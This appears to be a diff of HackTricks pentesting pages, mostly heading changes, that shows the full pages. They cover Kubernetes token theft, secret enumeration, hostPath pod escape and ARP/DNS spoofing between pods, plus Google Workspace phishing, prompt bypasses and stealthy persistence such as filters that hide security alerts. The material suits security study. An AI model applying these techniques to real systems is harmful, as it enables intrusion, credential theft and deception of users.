View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Kubernetes Enumeration # Kubernetes Tokens
## Kubernetes Tokens
If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**. If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
@ -27,7 +25,7 @@ In this folder you might find config files with **tokens and configurations to c
If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env: If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env:
### Service Account Tokens ## Service Account Tokens
Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.** Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.**
@ -62,15 +60,15 @@ Default location on **Minikube**:
* /var/lib/localkube/certs * /var/lib/localkube/certs
### Hot Pods ## Hot Pods
_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc. _**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
## RBAC # RBAC
If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac). If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac).
## Enumeration CheatSheet # Enumeration CheatSheet
In order to enumerate a K8s environment you need a couple of this: In order to enumerate a K8s environment you need a couple of this:
@ -82,7 +80,7 @@ With those details you can **enumerate kubernetes**. If the **API** for some rea
However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.
### Differences between `list` and `get` verbs ## Differences between `list` and `get` verbs
With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API: With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:
@ -115,7 +113,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get` The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %} {% endhint %}
### Using curl ## Using curl
From inside a pod you can use several env variables: From inside a pod you can use several env variables:
@ -128,7 +126,7 @@ export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\"" alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
``` ```
### Using kubectl ## Using kubectl
Having the token and the address of the API server you use kubectl or curl to access it as indicated here: Having the token and the address of the API server you use kubectl or curl to access it as indicated here:
@ -140,7 +138,7 @@ You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/doc
To find the HTTP request that `kubectl` sends you can use the parameter `-v=8` To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`
### Current Configuration ## Current Configuration
{% tabs %} {% tabs %}
{% tab title="Kubectl" %} {% tab title="Kubectl" %}
@ -169,7 +167,7 @@ kubectl config set-credentials USER_NAME \
--auth-provider-arg=id-token=( your id_token ) --auth-provider-arg=id-token=( your id_token )
``` ```
### Get Supported Resources ## Get Supported Resources
With this info you will know all the services you can list With this info you will know all the services you can list
@ -182,7 +180,7 @@ k api-resources --namespaced=false #Resources NOT specific to a namespace
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get Current Privileges ## Get Current Privileges
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -217,7 +215,7 @@ You can learn more about **Kubernetes RBAC** in
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %} {% endcontent-ref %}
### Get Others roles ## Get Others roles
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -235,7 +233,7 @@ kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clu
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get namespaces ## Get namespaces
Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
@ -253,7 +251,7 @@ kurl -k -v https://$APISERVER/api/v1/namespaces/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get secrets ## Get secrets
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -278,7 +276,7 @@ If you can read secrets you can use the following lines to get the privileges re
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
``` ```
### Get Service Accounts ## Get Service Accounts
As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges. As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
@ -296,7 +294,7 @@ curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get Deployments ## Get Deployments
The deployments specify the **components** that need to be **run**. The deployments specify the **components** that need to be **run**.
@ -315,7 +313,7 @@ curl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get Pods ## Get Pods
The Pods are the actual **containers** that will **run**. The Pods are the actual **containers** that will **run**.
@ -334,7 +332,7 @@ curl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get Services ## Get Services
Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack. Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
@ -353,7 +351,7 @@ curl -v https://$APISERVER/api/v1/namespaces/default/services/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get nodes ## Get nodes
Get all the **nodes configured inside the cluster**. Get all the **nodes configured inside the cluster**.
@ -371,7 +369,7 @@ curl -v https://$APISERVER/api/v1/nodes/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get DaemonSets ## Get DaemonSets
**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed. **DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
@ -389,7 +387,7 @@ curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get cronjob ## Get cronjob
Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action. Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
@ -407,7 +405,7 @@ curl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Get "all" ## Get "all"
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -417,7 +415,7 @@ k get all
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### **Get Pods consumptions** ## **Get Pods consumptions**
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -427,7 +425,7 @@ k top pod --all-namespaces
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
### Escaping from the pod ## Escaping from the pod
If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes. If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
@ -482,7 +480,7 @@ chroot /root /bin/bash
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/) Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
## References # References
{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %} {% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Kubernetes Network Attacks # Introduction
## Introduction
Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious containers to perform an [**ARP spoofing attack**](../../pentesting/pentesting-network/#arp-spoofing) to the containers on the same node and capture their traffic. Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious containers to perform an [**ARP spoofing attack**](../../pentesting/pentesting-network/#arp-spoofing) to the containers on the same node and capture their traffic.
@ -113,11 +111,11 @@ kubectl exec -it ubuntu-victim -n kube-system -- bash -c "apt update; apt instal
kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash" kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash"
``` ```
## Basic Kubernetes Networking # Basic Kubernetes Networking
If you want more details about the networking topics introduced here, go to the references. If you want more details about the networking topics introduced here, go to the references.
### ARP ## ARP
Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP. Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
@ -129,7 +127,7 @@ This fact implies that, by default, **every pod running in the same node** is go
Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.** Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.**
{% endhint %} {% endhint %}
### DNS ## DNS
In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace: In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace:
@ -179,11 +177,11 @@ Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is g
Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses. Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.
{% endhint %} {% endhint %}
## ARP Spoofing in pods in the same Node # ARP Spoofing in pods in the same Node
Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**. Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**.
### Scapy ## Scapy
```bash ```bash
python3 /tmp/arp_spoof.py python3 /tmp/arp_spoof.py
@ -255,14 +253,14 @@ if __name__=="__main__":
``` ```
{% endcode %} {% endcode %}
### ARPSpoof ## ARPSpoof
```bash ```bash
apt install dsniff apt install dsniff
arpspoof -t 172.17.0.9 172.17.0.10 arpspoof -t 172.17.0.9 172.17.0.10
``` ```
## DNS Spoofing # DNS Spoofing
As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**. As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**.
@ -299,7 +297,7 @@ If you try to create your own DNS spoofing script, if you **just modify the the
You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction). You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction).
{% endhint %} {% endhint %}
## References # References
* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) * [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters) * [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)

View file

@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Namespace Escalation
In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
Here are some techniques you can try to escape to a different namespace: Here are some techniques you can try to escape to a different namespace:
### Abuse K8s privileges ## Abuse K8s privileges
Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
@ -33,7 +31,7 @@ For more info about which privileges you can abuse read:
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %} {% endcontent-ref %}
### Escape to the node ## Escape to the node
If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:

View file

@ -17,31 +17,29 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Workspace Security # Workspace Phishing
## Workspace Phishing ## Generic Phishing Methodology
### Generic Phishing Methodology
{% content-ref url="../phishing-methodology/" %} {% content-ref url="../phishing-methodology/" %}
[phishing-methodology](../phishing-methodology/) [phishing-methodology](../phishing-methodology/)
{% endcontent-ref %} {% endcontent-ref %}
### Google Groups Phishing ## Google Groups Phishing
Apparently by default in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will looks **legit** and people might click on the link. Apparently by default in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will looks **legit** and people might click on the link.
### Hangout Phishing ## Hangout Phishing
You might be able either to directly talk with a person just having his email address or sending an invitation to talk. Either way, modify an email account maybe naming it "Google Security" and adding some Google logos, and the people will think they are talking to google: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s) You might be able either to directly talk with a person just having his email address or sending an invitation to talk. Either way, modify an email account maybe naming it "Google Security" and adding some Google logos, and the people will think they are talking to google: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s)
Just the **same technique** can be used with **Google Chat**. Just the **same technique** can be used with **Google Chat**.
### Google Doc Phishing ## Google Doc Phishing
You can create an **apparently legitimate document** and the in a comment **mention some email (like +user@gmail.com)**. Google will **send an email to that email address** notifying that he was mentioned in the document. You can **put a link in that document** to try to make the persona access it. You can create an **apparently legitimate document** and the in a comment **mention some email (like +user@gmail.com)**. Google will **send an email to that email address** notifying that he was mentioned in the document. You can **put a link in that document** to try to make the persona access it.
### Google Calendar Phishing ## Google Calendar Phishing
You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event looks legit and **put a comment indicating that they need to read something** (with the **phishing link**).\ You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event looks legit and **put a comment indicating that they need to read something** (with the **phishing link**).\
To make it looks less suspicious: To make it looks less suspicious:
@ -50,17 +48,17 @@ To make it looks less suspicious:
* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link. * Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
* Apparently using the API you can set to **True** that **people** has **accepted** the event and even create **comments on their behalf**. * Apparently using the API you can set to **True** that **people** has **accepted** the event and even create **comments on their behalf**.
### OAuth Phishing ## OAuth Phishing
Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trust** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions). Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trust** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and from Workspace admins can even prevent people to accept OAuth applications. More on this in the OAuth section. Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and from Workspace admins can even prevent people to accept OAuth applications. More on this in the OAuth section.
## Password Spraying # Password Spraying
In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you can use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) who will use AWS lambdas to change IP address. In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you can use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) who will use AWS lambdas to change IP address.
## Oauth Apps # Oauth Apps
**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP... **Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
@ -69,7 +67,7 @@ When a **user** wants to **use** that **application**, he will be **prompted** t
This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. Therefore, in organizations accounts, there are ways to prevent this from happening. This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. Therefore, in organizations accounts, there are ways to prevent this from happening.
### Unverified App prompt ## Unverified App prompt
As it was mentioned, google will always present a **prompt to the user to accept** the permissions he is giving the application on his behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making more difficult** to the user to grant the permissions to the app. As it was mentioned, google will always present a **prompt to the user to accept** the permissions he is giving the application on his behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making more difficult** to the user to grant the permissions to the app.
@ -78,14 +76,14 @@ This prompt appears in apps that:
* Uses any scope that can access to private data (Gmail, Drive, GCP, BigQuery...) * Uses any scope that can access to private data (Gmail, Drive, GCP, BigQuery...)
* Apps with less than 100 users (apps > 100 a review process is needed also to not show the unverified prompt) * Apps with less than 100 users (apps > 100 a review process is needed also to not show the unverified prompt)
### Interesting Scopes ## Interesting Scopes
You can [**find here**](https://developers.google.com/identity/protocols/oauth2/scopes) a list of all the Google OAuth scopes. You can [**find here**](https://developers.google.com/identity/protocols/oauth2/scopes) a list of all the Google OAuth scopes.
* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP. * **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
* **directory.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users. * **directory.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
## App Scripts # App Scripts
Developers can create App Scripts and set them as a standalone project or bound them to Google Docs/Sheets/Slides/Forms. App Scripts is code that will be triggered when a user with editor permission access the doc (and after accepting the OAuth prompt) Developers can create App Scripts and set them as a standalone project or bound them to Google Docs/Sheets/Slides/Forms. App Scripts is code that will be triggered when a user with editor permission access the doc (and after accepting the OAuth prompt)
@ -94,7 +92,7 @@ However, even if the app isn't verified there are a couple of ways to not show t
* If the publisher of the app is in the same Workspace as the user accessing it * If the publisher of the app is in the same Workspace as the user accessing it
* If the script is in a drive of the user * If the script is in a drive of the user
### Copy Document Unverified Prompt Bypass ## Copy Document Unverified Prompt Bypass
When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\ When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document.** If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document.**
@ -111,7 +109,7 @@ But can be prevented with:
![](<../.gitbook/assets/image (632).png>) ![](<../.gitbook/assets/image (632).png>)
### Shared Document Unverified Prompt Bypass ## Shared Document Unverified Prompt Bypass
Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**. Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
@ -126,45 +124,45 @@ This also means that if an **App Script already existed** and people has **grant
To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `<img>` tags. To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `<img>` tags.
{% endhint %} {% endhint %}
## Post-Exploitation # Post-Exploitation
### Google Groups Privesc ## Google Groups Privesc
By default in workspace a **group** can be **freely accessed** by any member of the organization.\ By default in workspace a **group** can be **freely accessed** by any member of the organization.\
Workspace also allow to **grant permission to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**. Workspace also allow to **grant permission to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**.
You potentially need access to the console to join groups that allow to be joined by anyone in the org. Check groups information in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups). You potentially need access to the console to join groups that allow to be joined by anyone in the org. Check groups information in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
### Privesc to GCP Summary ## Privesc to GCP Summary
* Abusing the **google groups privesc** you might be able to escalate to a group with some kind of privileged access to GCP * Abusing the **google groups privesc** you might be able to escalate to a group with some kind of privileged access to GCP
* Abusing **OAuth applications** you might be able to impersonate users and access to GCP on their behalf * Abusing **OAuth applications** you might be able to impersonate users and access to GCP on their behalf
### Access Groups Mail info ## Access Groups Mail info
If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**. If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**.
### Takeout - Download Everything Google Knows about an account ## Takeout - Download Everything Google Knows about an account
If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none) If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)
### Vault - Download all the Workspace data of users ## Vault - Download all the Workspace data of users
If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**. If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**.
### Contacts download ## Contacts download
From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user. From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user.
### Cloudsearch ## Cloudsearch
In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can just search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **find quickly sensitive information**. In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can just search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **find quickly sensitive information**.
### Currents ## Currents
In [**https://currents.google.com/**](https://currents.google.com) you can access a Google **Chat**, so you might find sensitive information in there. In [**https://currents.google.com/**](https://currents.google.com) you can access a Google **Chat**, so you might find sensitive information in there.
### Google Drive Mining ## Google Drive Mining
When **sharing** a document yo can **specify** the **people** that can access it one by one, **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**. When **sharing** a document yo can **specify** the **people** that can access it one by one, **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**.
@ -177,28 +175,28 @@ Some proposed ways to find all the documents:
* Search in internal chat, forums... * Search in internal chat, forums...
* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser) * **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
### **Keep Notes** ## **Keep Notes**
In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here. In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here.
### Persistence inside a Google account ## Persistence inside a Google account
If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) and **regenerate the 2FA backup codes** to know that even if the user change the password you **will be able to access his account**. Another option **instead** of **regenerating** the codes is to **enrol your own authenticator** app in the 2FA. If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) and **regenerate the 2FA backup codes** to know that even if the user change the password you **will be able to access his account**. Another option **instead** of **regenerating** the codes is to **enrol your own authenticator** app in the 2FA.
### Persistence via OAuth Apps ## Persistence via OAuth Apps
If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can configure to **disallow external and/or internal OAuth apps** without being reviewed.\ If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can configure to **disallow external and/or internal OAuth apps** without being reviewed.\
It is pretty common to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**. It is pretty common to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**.
### Persistence via delegation ## Persistence via delegation
You can just **delegate the account** to a different account controlled by the attacker. You can just **delegate the account** to a different account controlled by the attacker.
### Persistence via Android App ## Persistence via Android App
If you have a **session inside victims google account** you can browse to the **Play Store** and **install** a **malware** you have already uploaded it directly **in the phone** to maintain persistence and access the victims phone. If you have a **session inside victims google account** you can browse to the **Play Store** and **install** a **malware** you have already uploaded it directly **in the phone** to maintain persistence and access the victims phone.
### **Persistence via Gmail** ## **Persistence via Gmail**
* You can create **filters to hide** security notifications from Google * You can create **filters to hide** security notifications from Google
* from: (no-reply@accounts.google.com) "Security Alert" * from: (no-reply@accounts.google.com) "Security Alert"
@ -207,19 +205,19 @@ If you have a **session inside victims google account** you can browse to the **
* Create a forwarding address to send emails that contains the word "password" for example * Create a forwarding address to send emails that contains the word "password" for example
* Add **recovery email/phone under attackers control** * Add **recovery email/phone under attackers control**
### **Persistence via** App Scripts ## **Persistence via** App Scripts
You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**.
